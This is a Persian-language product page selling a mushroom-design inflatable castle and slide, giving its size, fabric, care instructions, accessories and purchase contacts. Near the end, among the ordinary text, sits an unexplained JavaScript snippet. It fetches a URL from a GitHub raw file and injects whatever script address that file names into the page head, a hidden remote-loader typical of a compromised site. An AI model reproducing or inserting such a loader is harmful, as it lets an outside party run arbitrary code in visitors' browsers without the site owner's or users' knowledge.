قلعه بادی طرح قارچی

 • سرسره بادی طرح قارچی شامل یک لاین سر و یک لاین راه پله می باشد معمولا در شهر بازی ها وپارک ها که فضای کافی داشته باشند استفاده میکنند.

  ابعاد و اندازه

  وزن قلعه بادی طرح قارچی 200 کیلوگرم، طول 7 متر و عرض 5 آن  متر می باشد. همچنین ارتفاع این دستگاه 6.4 متر است. بنابرین شما می توانیداین دستگاه بزرگ معمولا در شهر بازی ها وپارک ها که فضای کافی داشته باشند استفاده میکنند.

  جنس پارچه و دوخت قلعه بادی طرح قارچی

  پارچه این سرسره بادی از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این سرسره بادی با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است.

  نحوه نگهداری: سرسره بادی را باید با بند های که روی خود دستگاه نصب شده با میخ های بزرگ روی زمین بسته شود . درهنگاهم باد طوفان های شدید دستگاه به هیچ وجهی باد نکنید. برای شتستشوی دستگاه فقط با آب بشویید چون مواد های شیمیایی مانند مایع دستشویی ، ریکا ، وایتکی و … دستگاه را از بین می برد.

  لوازم جانبی

  این سرسره بادی نیازمند یک پمپ هوا (دمنده باد) یک نیم اسب می باشد. همچنین نیازمند اقلام پیشفرض مانند روکش سر و واکس است.

  محیط مناسب

  محیط مناسب برای این سرسره بادی بیشتردر شهربازی های سرپوشیده می باشد. به علت ارتفاع متوسط به بالا این سرسره بادی شما می توانید در محیط های مختلف با ارتفاع متوسط از آن استفاده کنید. اما استفاده از آن در محیط های بزرگ و سرباز بلامانع است.

  نحوه خرید قلعه بادی طرح قارچی

  تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این دستگاه می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید